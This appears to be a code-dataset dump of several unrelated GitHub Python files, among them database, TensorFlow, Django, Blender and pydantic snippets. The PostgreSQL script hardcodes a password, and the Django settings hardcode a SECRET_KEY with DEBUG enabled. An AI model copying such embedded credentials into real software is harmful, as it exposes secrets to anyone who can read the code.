8f87de5431b19e473791bd915dbfe6c442403abc | 8b38873dc0236be98a258e984e1722a9f00ece5f | /MIS 2100/atomcust/game_stats.py | a970dd5f9331778299c4648d56c4d915537cab35 | [] | no_license | danrludwig/MIS-2100 | 123557df38537c2750749e86bc3eed1142d0c5f2 | a653eb24e4bada5d7356159d4f84f6eb37447b0e | refs/heads/master | 2020-05-04T17:40:55.303909 | 2019-04-04T20:58:42 | 2019-04-04T20:58:42 | 179,321,895 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | import psycopg2
try:
connection = psycopg2.connect(user = 'postgres',
password = 'oysome!1',
host = 'localhost',
port = '5432',
database = 'boys_basketball'
)
cursor = connection.cursor()
create_table_query = """ CREATE TABLE phone
(ID INT PRIMARY KEY NOT NULL,
MODEL TEXT NOT NULL,
PRICE REAL);"""
cursor.execute(create_table_query)
connection.commit()
print('Table created sucessfully in PostgreSQL')
cursor.close()
connection.close()
except (Exception, psycopg2.Error) as error:
print('Error while connecting to PostgreSQL', error)
| [
"noreply@github.com"
] | noreply@github.com |
531852ea327771f1089a88d011fac0d74d818f24 | 49eaf0ccabb65b02da367764f9d5a3748ecddaf4 | /03-rank.py | 3d725273d96065f5be1768a62f909c7f1f69c5e4 | [] | no_license | asharifara/tensorflow-examples | 4ae8b037e4a5a13bec49bdb977d0338ce22be1e7 | 3babf63896dd954bd2925535bb4efa9dcd749533 | refs/heads/master | 2022-04-01T19:04:29.288983 | 2019-12-20T03:17:21 | 2019-12-20T03:17:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | import tensorflow as tf
session = tf.Session()
zeroD = tf.constant(4)
oneD = tf.constant(['ali', 'sharifara'])
twoD = tf.constant([[1.0, 2.9], [3.7, 4.4]])
threeD = tf.constant([[[1.0, 2.9], [3.7, 2.4]], [[3.7, 2.4], [3.7, 2.4]]])
print(session.run(tf.rank(zeroD)))
print(session.run(tf.rank(oneD)))
print(session.run(tf.rank(twoD)))
print(session.run(tf.rank(threeD)))
session.close()
| [
"noreply@github.com"
] | noreply@github.com |
7023ccfa04ae9db5e41aa1991b5c1bdc4d513f2a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02948/s243741324.py | 2cffaa3be99d436febcc3c638d3fc41cc448b571 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | from heapq import heappop,heappush,heapify
from collections import deque
N,M=map(int,input().split())
A,B,C = [0]*N,[0]*N,[0]*N
for i in range(N):
A[i],B[i] = map(int,input().split())
C[i]=[A[i],B[i]]
C.sort()
C=deque(C)
a=[]
heapify(a)
ans=0
for i in range(M,-1,-1):
while C:
if C[0][0]<=M-i:
heappush(a,(-1)*C[0][1])
C.popleft()
else:
break
if len(a)>0:
p = heappop(a)
ans += (-1)*p
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
7ae77f3fc583e7b1cab76db09ec2b17e3baa6bc8 | 9fc69e503a4980efe2f47fb0416f2f414e95cde6 | /theatre/shows/migrations/0010_auto_20150204_2008.py | 1814bc2517dcbfe59b4c83a807780ca589d60f82 | [] | no_license | mkgilbert/cs399_the_theatre | a5f05a5e95fc2b67fb74047c0adc3e5c92d43a68 | a775065be3eaef5ed49e7007ac20f7bfbc7e0a1e | refs/heads/master | 2016-09-05T09:09:22.385254 | 2015-02-06T02:09:13 | 2015-02-06T02:09:13 | 29,870,404 | 1 | 0 | null | 2015-02-03T06:13:22 | 2015-01-26T16:38:27 | Python | UTF-8 | Python | false | false | 587 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def delete_some_tickets(apps, schema_editor):
Show = apps.get_model("shows", "Show")
shows = Show.objects.all()
for show in shows:
tickets = show.tickets.all()
for ticket in tickets:
if ticket.seat.row > 15:
ticket.delete()
class Migration(migrations.Migration):
dependencies = [
('shows', '0009_auto_20150204_1906'),
]
operations = [
migrations.RunPython(delete_some_tickets)
]
| [
"justin.poehnelt@gmail.com"
] | justin.poehnelt@gmail.com |
b84dd9230ccb462252288d436554e4655ed6d463 | 58a82d4b72e8c83d8c93a3d3639aa65fbdc9fcbd | /BCPrompt/bc_operators.py | a9acc39d4ec5b58e487e2b05b20c2289164e5737 | [] | no_license | 8Observer8/myblendercontrib | 4de9b880da56a909b3da19c732e32557ab48400b | 71aa26457c50622cf5646a7aa39fbe11491f3e7b | refs/heads/master | 2021-01-15T15:33:13.133667 | 2015-10-14T15:38:48 | 2015-10-14T15:38:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,961 | py | import bpy
from console_python import add_scrollback
from .bc_command_dispatch import (
in_scene_commands,
in_search_commands,
in_sverchok_commands,
in_core_dev_commands,
in_modeling_tools,
in_upgrade_commands,
in_bpm_commands,
in_fast_ops_commands)
history_append = bpy.ops.console.history_append
addon_enable = bpy.ops.wm.addon_enable
def print_most_useful():
content = '''\
for full verbose descriptor use -man
command | description
-----------+----------------
tt | tb | turntable / trackball nav.
cen | centers 3d cursor
cenv | centers 3d cursor, aligns views to it
cento | centers to selected
endswith! | copy current console line if ends with exclm.
x?bpy | search blender python for x
x?bs | search blenderscripting.blogspot for x
x?py | search python docs for x
x?se | search B3D StackExchange
x??se | regular StackExchange search
vtx, xl | enable or trigger tinyCAD vtx (will download)
ico | enables icon addon in texteditor panel (Dev)
123 | use 1 2 3 to select vert, edge, face
-img2p | enabled image to plane import addon
-or2s | origin to selected.
-dist | gives local distance between two selected verts
-gist -o x | uploads all open text views as x to anon gist.
-debug | dl + enable extended mesh index visualiser. it's awesome.
-----------+----------------------------------------------------------
-idxv | enable by shortcut name (user defined)
enable <named addon> | package name or folder name
v2rdim | sets render dimensions to current strip.
fc | fcurrent -> end.frame
'''
add_scrollback(content, 'OUTPUT')
class TextSyncOps(bpy.types.Operator):
bl_idname = "text.text_upsync"
bl_label = "Upsyncs Text from disk changes"
def execute(self, context):
text_block = context.edit_text
bpy.ops.text.resolve_conflict(resolution='RELOAD')
return{'FINISHED'}
class ConsoleDoAction(bpy.types.Operator):
bl_label = "ConsoleDoAction"
bl_idname = "console.do_action"
def execute(self, context):
m = bpy.context.space_data.history[-1].body
m = m.strip()
DONE = {'FINISHED'}
if any([
in_scene_commands(context, m),
in_search_commands(context, m),
in_sverchok_commands(context, m),
in_core_dev_commands(context, m),
in_modeling_tools(context, m),
in_upgrade_commands(context, m),
in_bpm_commands(context, m),
in_fast_ops_commands(context, m)
]):
return DONE
elif m == '-ls':
print_most_useful()
return DONE
elif m == 'cl':
bpy.ops.console.clear()
return DONE
return {'FINISHED'}
def register():
bpy.utils.register_module(__name__)
def unregister():
bpy.utils.unregister_module(__name__)
| [
"Develop@Shaneware.Biz"
] | Develop@Shaneware.Biz |
91c53302d52e9d5a99a4e0d0b685179371931b6d | cc08f8eb47ef92839ba1cc0d04a7f6be6c06bd45 | /Personal/Jaypur/Jaypur/settings.py | 76bd9d7c357d60980068b2b15d2475f763bef64f | [] | no_license | ProsenjitKumar/PycharmProjects | d90d0e7c2f4adc84e861c12a3fcb9174f15cde17 | 285692394581441ce7b706afa3b7af9e995f1c55 | refs/heads/master | 2022-12-13T01:09:55.408985 | 2019-05-08T02:21:47 | 2019-05-08T02:21:47 | 181,052,978 | 1 | 1 | null | 2022-12-08T02:31:17 | 2019-04-12T17:21:59 | null | UTF-8 | Python | false | false | 3,158 | py | """
Django settings for Jaypur project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '_c4#s_+@o6kx5@ej$9+n-1)-_1+0rqscbzrd()25q=f@=e7m34'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app.apps.AppConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Jaypur.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Jaypur.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
| [
"prosenjitearnkuar@gmail.com"
] | prosenjitearnkuar@gmail.com |
a8520e9f05d38ae8d69d2db4c4af9f856b832dd5 | 37132d47fd22e98ffdb5f6673ebacb41ee12f762 | /src/users/models.py | cb642d67f5734c9a87f3aecb5f67f2f823023dee | [
"Apache-2.0"
] | permissive | git-vish/CodeSpaceAPI | b0037dc46e28d108a23519492269f13adf0c9e4e | 7ad4327e0eef3019098730358c4a23312bc85615 | refs/heads/main | 2023-06-23T16:49:53.749045 | 2021-07-25T19:13:32 | 2021-07-25T19:13:32 | 382,095,296 | 1 | 0 | Apache-2.0 | 2021-07-01T16:32:20 | 2021-07-01T16:32:20 | null | UTF-8 | Python | false | false | 1,553 | py | """Pydantic schemas for Users API.
"""
# Author Info
__author__ = 'Vishwajeet Ghatage'
__date__ = '11/07/21'
__email__ = 'cloudmail.vishwajeet@gmail.com'
# Library Imports
from typing import List, Optional
from pydantic import BaseModel, EmailStr
class UserBase(BaseModel):
"""Base User model."""
email: EmailStr
class UserCreate(UserBase):
"""Used to create user.
Note:
---------
Password encryption must be performed at front end.
"""
first_name: str
last_name: str
password: str
class UserLogin(UserBase):
"""Used to login user.
Note:
---------
Password encryption must be performed at front end.
"""
password: str
class Token(BaseModel):
"""JWT Token."""
access_token: str
token_type: str
class ChangePassword(BaseModel):
"""New Password."""
new_password: str
class ForgotPassword(UserBase):
"""Used to reset password."""
pass
class ResetPassword(ChangePassword):
"""Password reset request."""
verification_code: str
class ProfileGet(BaseModel):
"""Used to get user profile."""
name: str
email: EmailStr
bio: str
batch: str
linkedin: str
github: str
skills: List[str]
profile_pic: str
class ProfileUpdate(BaseModel):
"""Used to update user profile."""
first_name: Optional[str]
last_name: Optional[str]
email: Optional[EmailStr]
bio: Optional[str]
batch: Optional[str]
linkedin: Optional[str]
github: Optional[str]
skills: Optional[List[str]] = ['skill']
| [
"cloudmail.vishwajeet@gmail.com"
] | cloudmail.vishwajeet@gmail.com |
8652f163ca8f8ea1ea0d3cc5fceb48a51d48d380 | 4f2e01b2c9934aa3906482056a2eb89b0b09cd7f | /parse_data.py | c56b7db971f4b9de577faead453bcc7518208b5c | [] | no_license | dhruvinsh/influxdb | 4c109bf51813a698d17d2a44cc0a815028e70c42 | 81335314b2e6698a5a0ab1b345de011050044de5 | refs/heads/master | 2020-05-23T20:50:44.006036 | 2019-05-18T17:19:37 | 2019-05-18T17:19:37 | 184,688,270 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | def _dict_to_line(dikt: dict) -> str:
return ','.join(['{}={}'.format(k, v) for k, v in dikt.items()])
def make_line(data: dict) -> str:
"""allows to make line out of json
data = {
'measurement': 'cpu',
'tags': {'hostname': 'localhost', 'region': 'ca'},
'fields': {'value': 0.51}
}
==> cpu,hostname=localhost,region=ca value=0.51
"""
query = ''
measurement = data.get("measurement")
tags = data.get("tags")
fields = data.get("fields")
assert measurement is not None, "Should need to have measurement"
assert fields is not None, "Should need to have fields"
query += measurement
if tags:
query += ',' + _dict_to_line(tags)
if fields:
query += ' ' + _dict_to_line(fields)
return query
| [
"dhruvin3@gmail.com"
] | dhruvin3@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.